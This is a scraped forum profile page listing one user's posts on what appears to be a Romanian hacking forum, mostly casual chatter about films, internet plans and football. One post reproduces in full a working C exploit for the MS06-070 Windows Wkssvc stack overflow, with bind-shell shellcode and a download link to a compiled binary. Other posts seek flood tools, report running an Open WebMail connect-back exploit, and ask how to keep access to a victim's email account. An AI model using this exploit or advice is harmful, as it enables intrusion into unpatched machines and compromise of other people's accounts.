Jump to content

Christian

Active Members
  • Posts

    90
  • Joined

  • Last visited

Everything posted by Christian

  1. asta stiam deja...dar nu gasesc nici un nuker care sa aiba vre-un efect asupra lui..hai ca deja incepem sa devenim offtopic.
  2. dar ceva pt vypress nu aveti? nici asta nu are efect...nu am gasit prog de flood pt el
  3. Marc et Claude - Tremble (vinil club mix) & in coada de asteptare Happy Fathers - Bounce
  4. si eu am conexiune tot prin PPPoE (nu ierdeesh) cu 3 feluri de tarifare 1. Net non-stop = 10$ 2. 12 ore/zi = 7$ 3. 200 ore/luna = 7$ insa am inteles ca la a 3-a varianta exista o smecherie prin care poti sa te conectezi chiar daca ai terminat cele 200 ore ..stie cineva ceva??
  5. sincer nici tie nu ti-ar strica :@ probabil ca nu merge numai in LAN ..ip-ul caruia ii dai shutdown trebuie sa aiba portul 135 (sau 445 ..nu`s sigur) deschis..insa majoritatea providerilor blocheaza porturile astea si in cele mai multe cazuri n`o sa mearga
  6. hai ca deja incepeti sa o dati in SF ... acum incep sa inteleg de ce sunt interzise unele filme copiilor sun 12 ani oricum povestea cu virusul numit prostie e REALA !! cunosc cateva persoane infectate ..noroc ca nu e contagios
  7. ce versiune de windows este afectata ? banuiesc ca win2k am incercat peWinXp SP1 si SP2 si nu merge ..
  8. nu cred ca ar face asta ..el se straduieste sa creasca in ochii romanilor ..iti dai seama cum l-ar privi romanii daca i-ar da afara din case da` ce ... tu nu te distrezi ? parerea ta! stie el ce stie..uite ca l-a ajutat dumnezeu si azi ..a facut egal cu pandurii :@ mare noroc cu siguranta nu au lana de aur dar are el rotitzele din cap bine unse concluzia ... JIJI RULZZZZZZZ !!! :@
  9. /*************************************************************************** Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit by cocoruder(frankruder_at_hotmail.com),2006.11.15 page:[url]http://ruder.cdut.net/default.asp[/url] Code fixed by S A Stevens - 17.11.2006 - changed shellcode, Changed code to correct jmp EBX address and fixed exploit output status. Should work on Windows 2000 Server SP4 (All Languages) usage: ms06070 targetip DomainName notice: Make sure the DomainName is valid and live,more informations see [url]http://research.eeye.com/html/advisories/published/AD20061114.html[/url], cocoruder just research the vulnerability and give the exploit for Win2000. ****************************************************************************/ #include <stdio.h> #include <windows.h> #include <winsock.h> #include <tchar.h> #pragma comment(lib, "wsock32.lib") unsigned char SmbNeg[] = "x00x00x00x2fxffx53x4dx42x72x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x88x05x00x00x00x00x00x0cx00x02x4ex54" "x20x4cx4dx20x30x2ex31x32x00"; unsigned char Session_Setup_AndX_Request[]= "x00x00x00x48xffx53x4dx42x73x00" "x00x00x00x08x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00xffxffx88x05x00x00x00x00x0dxffx00x00x00xff" "xffx02x00x88x05x00x00x00x00x00x00x00x00x00x00x00" "x00x01x00x00x00x0bx00x00x00x6ex74x00x70x79x73x6d" "x62x00"; unsigned char TreeConnect_AndX_Request[]= "x00x00x00x58xffx53x4dx42x75x00" "x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00xffxfex00x08x00x03x04xffx00x58x00x08" "x00x01x00x2dx00x00x5cx00x5cx00x31x00x37x00x32x00" "x2ex00x32x00x32x00x2ex00x35x00x2ex00x34x00x36x00" "x5cx00x49x00x50x00x43x00x24x00x00x00x3fx3fx3fx3f" "x3fx00"; unsigned char NTCreate_AndX_Request[]= "x00x00x00x64xffx53x4dx42xa2x00" "x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00" "x00x00x00x08x04x0cx00x08x00x01x18xffx00xdexdex00" "x0ex00x16x00x00x00x00x00x00x00x9fx01x02x00x00x00" "x00x00x00x00x00x00x00x00x00x00x03x00x00x00x01x00" "x00x00x40x00x40x00x02x00x00x00x01x11x00x00x5cx00" "x77x00x6bx00x73x00x73x00x76x00x63x00x00x00"; unsigned char Rpc_Bind_Wkssvc[]= "x00x00x00x92xffx53x4dx42x25x00" "x00x00x00x18x01x20x00x00x00x00x00x00x00x00x00x00" "x00x00x01x08xf0x0bx03x08xf7x4cx10x00x00x48x00x00" "x04xe0xffx00x00x00x00x00x00x00x00x00x00x00x00x4a" "x00x48x00x4ax00x02x00x26x00x01x40x4fx00x5cx50x49" "x50x45x5cx00x05x00x0bx03x10x00x00x00x48x00x00x00" "x00x00x00x00xd0x16xd0x16x00x00x00x00x01x00x00x00" "x00x00x01x00x98xd0xffx6bx12xa1x10x36x98x33x46xc3" "xf8x7ex34x5ax01x00x00x00x04x5dx88x8axebx1cxc9x11" "x9fxe8x08x00x2bx10x48x60x02x00x00x00"; unsigned char Rpc_NetrJoinDomain2_Header[]= "x00x00x00xa8xffx53x4dx42x25x00" "x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00" "x00x00x00x08x6cx07x00x08xc0x01x10x00x00x54x00x00" "x00x00x04x00x00x00x00x00x00x00x00x00x00x00x00x54" "x00x54x00x54x00x02x00x26x00x00x40x65x00x00x5cx00" "x50x00x49x00x50x00x45x00x5cx00x00x00x00x00x05x00" "x00x03x10x00x00x00x54x00x00x00x01x00x00x00x3cx00" "x00x00x00x00" "x16x00" //opnum,NetrJoinDomain2 "x30x2ax42x00" "x0ex00x00x00" "x00x00x00x00" "x0ex00x00x00" "x5cx00x5cx00x31x00x37x00x32x00" "x2ex00x32x00x32x00x2ex00x35x00x2ex00x34x00x31x00" "x00x00" "x10x01x00x00" "x00x00x00x00" "x10x01x00x00"; unsigned char Rpc_NetrJoinDomain2_End[]= "x00x00x00x00" "x00x00x00x00" "x00x00x00x00" "x01x00x00x00"; unsigned char *lpDomainName=NULL; DWORD dwDomainNameLen=0; /* win32_bind - EXITFUNC=seh LPORT=4443 Size=344 Encoder=PexFnstenvSub [url]http://metasploit.com[/url] */ unsigned char shellcode[] = "x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xe9" "x59x23xcex83xebxfcxe2xf4x15x33xc8x83x01xa0xdcx31" "x16x39xa8xa2xcdx7dxa8x8bxd5xd2x5fxcbx91x58xccx45" "xa6x41xa8x91xc9x58xc8x87x62x6dxa8xcfx07x68xe3x57" "x45xddxe3xbaxeex98xe9xc3xe8x9bxc8x3axd2x0dx07xe6" "x9cxbcxa8x91xcdx58xc8xa8x62x55x68x45xb6x45x22x25" "xeax75xa8x47x85x7dx3fxafx2ax68xf8xaax62x1ax13x45" "xa9x55xa8xbexf5xf4xa8x8exe1x07x4bx40xa7x57xcfx9e" "x16x8fx45x9dx8fx31x10xfcx81x2ex50xfcxb6x0dxdcx1e" "x81x92xcex32xd2x09xdcx18xb6xd0xc6xa8x68xb4x2bxcc" "xbcx33x21x31x39x31xfaxc7x1cxf4x74x31x3fx0ax70x9d" "xbax0ax60x9dxaax0axdcx1ex8fx31x32x95x8fx0axaax2f" "x7cx31x87xd4x99x9ex74x31x3fx33x33x9fxbcxa6xf3xa6" "x4dxf4x0dx27xbexa6xf5x9dxbcxa6xf3xa6x0cx10xa5x87" "xbexa6xf5x9exbdx0dx76x31x39xcax4bx29x90x9fx5ax99" "x16x8fx76x31x39x3fx49xaax8fx31x40xa3x60xbcx49x9e" "xb0x70xefx47x0ex33x67x47x0bx68xe3x3dx43xa7x61xe3" "x17x1bx0fx5dx64x23x1bx65x42xf2x4bxbcx17xeax35x31" "x9cx1dxdcx18xb2x0ex71x9fxb8x08x49xcfxb8x08x76x9f" "x16x89x4bx63x30x5cxedx9dx16x8fx49x31x16x6exdcx1e" "x62x0exdfx4dx2dx3dxdcx18xbbxa6xf3xa6x19xd3x27x91" "xbaxa6xf5x31x39x59x23xce"; DWORD fill_len_1 =0x84c; //fill data DWORD fill_len_2 =0x1000; //fill rubbish data DWORD addr_jmp_ebx=0x77F92A9B; //jmp ebx address,in ntdll.dll unsigned char code_jmp8[]= //jmp 8 "xEBx06x90x90"; unsigned char *Rpc_NetrJoinDomain2=NULL; DWORD dwRpc_NetrJoinDomain2=0; unsigned char recvbuff[2048]; void showinfo(void) { printf("Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploitn"); printf("by cocoruder(frankruder_at_hotmail.com),2006.10.15n"); printf("page:http://ruder.cdut.net/default.aspnn"); printf("Code fixed by S A Stevens - 16.11.2006n"); printf("Should work on Windows 2000 Server SP4 (All Languages)nn"); printf("usage:n"); printf("ms06070 targetip DomainNamenn"); printf("notice:n"); printf("Make sure the DomainName is valid and live,more informations seen"); printf("http://research.eeye.com/html/advisories/published/AD20061114.html,n"); printf("cocoruder just research the vulnerability and give the exploit for Win2000.nnn"); } void neg ( int s ) { char response[1024]; memset(response,0,sizeof(response)); send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0); } void MakeAttackPacket(char *lpDomainNameStr) { DWORD j,len,b_flag; dwDomainNameLen=(strlen(lpDomainNameStr)+2)*2; lpDomainName=(unsigned char *)malloc(dwDomainNameLen); memset(lpDomainName,0,dwDomainNameLen); MultiByteToWideChar(CP_ACP,0,lpDomainNameStr,-1,(LPWSTR)lpDomainName,dwDomainNameLen); *(unsigned char *)(lpDomainName+dwDomainNameLen-2)=0x5C; *(unsigned char *)(lpDomainName+dwDomainNameLen-4)=0x5C; len=dwDomainNameLen+ //DomainName fill_len_1-3*2+ //fill_len_1 4+ //jmp 8 4+ //addr jmp ebx sizeof(shellcode)-1+ //shellcode fill_len_2+ //fill_len_2 2; //0x0000 b_flag=0; if (len%2==1) { len++; b_flag=1; } dwRpc_NetrJoinDomain2=sizeof(Rpc_NetrJoinDomain2_Header)-1+ len+ sizeof(Rpc_NetrJoinDomain2_End)-1; //end //malloc Rpc_NetrJoinDomain2=(unsigned char *)malloc(dwRpc_NetrJoinDomain2); if (Rpc_NetrJoinDomain2==NULL) { printf("malloc error!n"); return; } //fill nop memset(Rpc_NetrJoinDomain2,0x90,dwRpc_NetrJoinDomain2); j=sizeof(Rpc_NetrJoinDomain2_Header)-1; //update para1 length *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x0c)=len/2; *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x04)=len/2; //copy header memcpy(Rpc_NetrJoinDomain2,Rpc_NetrJoinDomain2_Header,sizeof(Rpc_NetrJoinDomain2_Header)-1); j=sizeof(Rpc_NetrJoinDomain2_Header)-1; //copy DomainName memcpy(Rpc_NetrJoinDomain2+j,lpDomainName,dwDomainNameLen); j=j+dwDomainNameLen; //calculate offset j=j+fill_len_1-3*2; //jmp 8 memcpy(Rpc_NetrJoinDomain2+j,code_jmp8,sizeof(code_jmp8)-1); j=j+4; //jmp ebx address *(DWORD *)(Rpc_NetrJoinDomain2+j)=addr_jmp_ebx; j=j+4; //copy shellcode memcpy(Rpc_NetrJoinDomain2+j,shellcode,sizeof(shellcode)-1); j=j+sizeof(shellcode)-1; //fill data memset(Rpc_NetrJoinDomain2+j,0x41,fill_len_2); j=j+fill_len_2; //0x0000(NULL) if (b_flag==0) { Rpc_NetrJoinDomain2[j]=0x00; Rpc_NetrJoinDomain2[j+1]=0x00; j=j+2; } else if (b_flag==1) { Rpc_NetrJoinDomain2[j]=0x00; Rpc_NetrJoinDomain2[j+1]=0x00; Rpc_NetrJoinDomain2[j+2]=0x00; j=j+3; } //copy other parameter memcpy(Rpc_NetrJoinDomain2+j,Rpc_NetrJoinDomain2_End,sizeof(Rpc_NetrJoinDomain2_End)-1); j=j+sizeof(Rpc_NetrJoinDomain2_End)-1; } void main(int argc,char **argv) { WSADATA ws; struct sockaddr_in server; SOCKET sock; DWORD ret; WORD userid,treeid,fid; WSAStartup(MAKEWORD(2,2),&ws); sock = socket(AF_INET,SOCK_STREAM,0); if(sock<=0) { return; } server.sin_family = AF_INET; server.sin_addr.s_addr = inet_addr(argv[1]); server.sin_port = htons((USHORT)445); printf("[+] Connecting %sn",argv[1]); ret=connect(sock,(struct sockaddr *)&server,sizeof(server)); if (ret==-1) { printf("Connection Error, Port 445 Firewalled?n"); return; } neg(sock); recv(sock,(char *)recvbuff,sizeof(recvbuff),0); ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0); if (ret<=0) { printf("send Session_Setup_AndX_Request error!n"); return; } recv(sock,(char *)recvbuff,sizeof(recvbuff),0); userid=*(WORD *)(recvbuff+0x20); //get userid memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0); if (ret<=0) { printf("send TreeConnect_AndX_Request error!n"); return; } recv(sock,(char *)recvbuff,sizeof(recvbuff),0); treeid=*(WORD *)(recvbuff+0x1c); //get treeid //send NTCreate_AndX_Request memcpy(NTCreate_AndX_Request+0x20,(char *)&userid,2); //update userid memcpy(NTCreate_AndX_Request+0x1c,(char *)&treeid,2); //update treeid ret=send(sock,(char *)NTCreate_AndX_Request,sizeof(NTCreate_AndX_Request)-1,0); if (ret<=0) { printf("send NTCreate_AndX_Request error!n"); return; } recv(sock,(char *)recvbuff,sizeof(recvbuff),0); fid=*(WORD *)(recvbuff+0x2a); //get fid //rpc bind memcpy(Rpc_Bind_Wkssvc+0x20,(char *)&userid,2); memcpy(Rpc_Bind_Wkssvc+0x1c,(char *)&treeid,2); memcpy(Rpc_Bind_Wkssvc+0x43,(char *)&fid,2); *(DWORD *)Rpc_Bind_Wkssvc=htonl(sizeof(Rpc_Bind_Wkssvc)-1-4); ret=send(sock,(char *)Rpc_Bind_Wkssvc,sizeof(Rpc_Bind_Wkssvc)-1,0); if (ret<=0) { printf("send Rpc_Bind_Wkssvc error!n"); return; } recv(sock,(char *)recvbuff,sizeof(recvbuff),0); MakeAttackPacket((char *)argv[2]); memcpy(Rpc_NetrJoinDomain2+0x20,(char *)&userid,2); memcpy(Rpc_NetrJoinDomain2+0x1c,(char *)&treeid,2); memcpy(Rpc_NetrJoinDomain2+0x43,(char *)&fid,2); *(DWORD *)Rpc_NetrJoinDomain2=htonl(dwRpc_NetrJoinDomain2-4); *(WORD *)(Rpc_NetrJoinDomain2+0x27)=dwRpc_NetrJoinDomain2-0x58; //update Total Data Count *(WORD *)(Rpc_NetrJoinDomain2+0x3b)=dwRpc_NetrJoinDomain2-0x58; //update Data Count *(WORD *)(Rpc_NetrJoinDomain2+0x45)=dwRpc_NetrJoinDomain2-0x47; //update Byte Count *(WORD *)(Rpc_NetrJoinDomain2+0x60)=dwRpc_NetrJoinDomain2-0x58; //update Frag Length ret=send(sock,(char *)Rpc_NetrJoinDomain2,dwRpc_NetrJoinDomain2,0); if (ret<=0) { printf("send Rpc_NetrJoinDomain2 error!n"); return; } printf("[+] Sent attack packet successfully, Try telnet on %s:4443?n",argv[1]); recv(sock,(char *)recvbuff,sizeof(recvbuff),0); closesocket(sock); } // milw0rm.com [2006-11-17] and the compiled version: http://share.urbanfriends.us/savefile_php/uploads/f783ca4bda.rar
  10. imi cer scuze ..versiunea anterioara am pierdut-o cu sursa cu tot dupa o formatare neprogramata iar versiunea asta am facut-o ulterior, in graba si probabil am gresit ceva .. o sa-mi fac timp zilele astea pt a repara eventualele greseli :@
  11. Nu e complet inizibil. Prin comanda attrib +H +S il faci Hidden si System, insa daca dai de la Folder Options > Show hidden files and folders si debifeziHide protected operating system files o sa il vezi yep` ...u`r right dar sa fim seriosi ..cati crezi ca stiu de optiunea aia ?eu unu` nu stiam
  12. ar mai fi o a 3-a varianta si anume ascunderea cu ajutorul comenzii attrib ex: dai in CMD comanda "attrib +H +S FolderName" astfel folderul o sa fie complet invizibil
  13. link nou: http://share.urbanfriends.us/savefile_php/uploads/6df49cee38.rar
  14. Chiar aveam nevoie de un exploit pt Open WebMail ... l-am testat pe Open WebMail version 1.81 si rezultatul este: [+] Listen on port: 4444 [+] Prepairing ShellCode...Done! [+] Inject Shellcode to out host...Done! [+] Chmod our ShellCode on host...Done! [+] Exec ShellCode...Done! [+] Wait for Connect-back Can't Hack User defined signal 2 any ideas ? :?
  15. 10x ppl ! majoritatea filmelor pe care le-ati mentionat nu le-am vazut asa ca am de downloadat nu gluma ..noroc cu provideru ca mi-a marit din nou viteza de download btw daca mai stie cineva nume de filme peste care merita sa tragi un ochi cred ca nu s-ar supara nimeni daca le-ati posta aici
  16. Smart noob in caz ca nu ti-ai dat seama e 150% gluma probabil facuta din insistentele unora de a-l convinge sa le faca nu stiu ce. n00b ce ma faceam eu fara tine? probabil imi era mai bine mi-am dat seama ca era gluma si am replicat cu o alta gluma, n00b
  17. ce filme ati mai vazut in ultimul timp si v-au lasat o impresie placuta? poate sa ma indrume cineva spre 1-2 filme bune?(mai noi daca se poate) pt ca sincer m-am saturat sa vad filme de tot kktu`(si cand zic tot kktu` ma refer la TOT KKTU` !!!)nu vreau sa mai pierd timpul aiurea cu astfel de filme so ..give me some names !?!
  18. la multi ani SpiridusuCaddy !! sa ai bani si bogatzii ...da` sa-mi zici unde le tzii
  19. 10x virusz ptr programe eu unul ma impac bine cu rapidshare ...iau cu viteza maxima de pe ele (62 kB/s) pe cand de pe urban iau cu maxim 30 kB/s singurul dezavantaj este ca pe rapidshare fisierele expira destul de rpd apropo de VC++ ..in caz ca-l ia cineva.. nu o sa mearga instalat doar ruland Setup.exe ..pt a-l instala urmati pasii: 1.faci o copie a fisierului din setup/VS98ENT.STF si o redenumesti in acmsetup.STF 2.copiaza tot ce contine folderul /setup/ in folderul precedent (cel care contine ACMBOOT.EXE) *.nu uita sa pui si acmsetup.STF in folderul care contine ACMBOOT.EXE 3.instaleaza ruland fisierul acmsetup.exe sau Setup.exe 4.Enjoy it! celelalte programe nu le-am testat si nu stiu daca fac probleme la instalare
  20. Scarto poate sa scrie si in chineza ...odata ce e TUTORIAL VIDEO ar trebui sa intelegi nice post YceFire
  21. nu'>http://share.urbanfriends.us/uploads/3af7c572f1.rar nu trisasti la teste si nu postati raspunsurile lor ptr a putea sa le faca cat mai multi
  22. asta vinde gradinarului castravetzi :@ Ce lake ! =) E o arhiva .exe (cel mai probabil bots) mai exact un trojan downloader
  23. eddie47 esti sigur ca ai incercat si "neptune" ? btw Urans e a 7-a planeta de la soare
  24. function Try(passwd) { if (passwd =="h4x0r") { alert("Alright! On to level 2..."); location.href = "level2-xfdgnh.xhtml"; } else { alert("The password is incorrect. Please don't try again."); location.href = "http://www.disney.com/"; } asta o poti gasi in sursa paginii dar ce farec mai are jocul daca iti spune altcineva raspunsurile? incearca sa le descoperi singur
  25. mi se pare mai sigura metoda asta fata de cea cu cookie browser exista vre-o modalitate prin care sa am acces mai mult de 24 h la mail-ul victimei ?
×
×
  • Create New...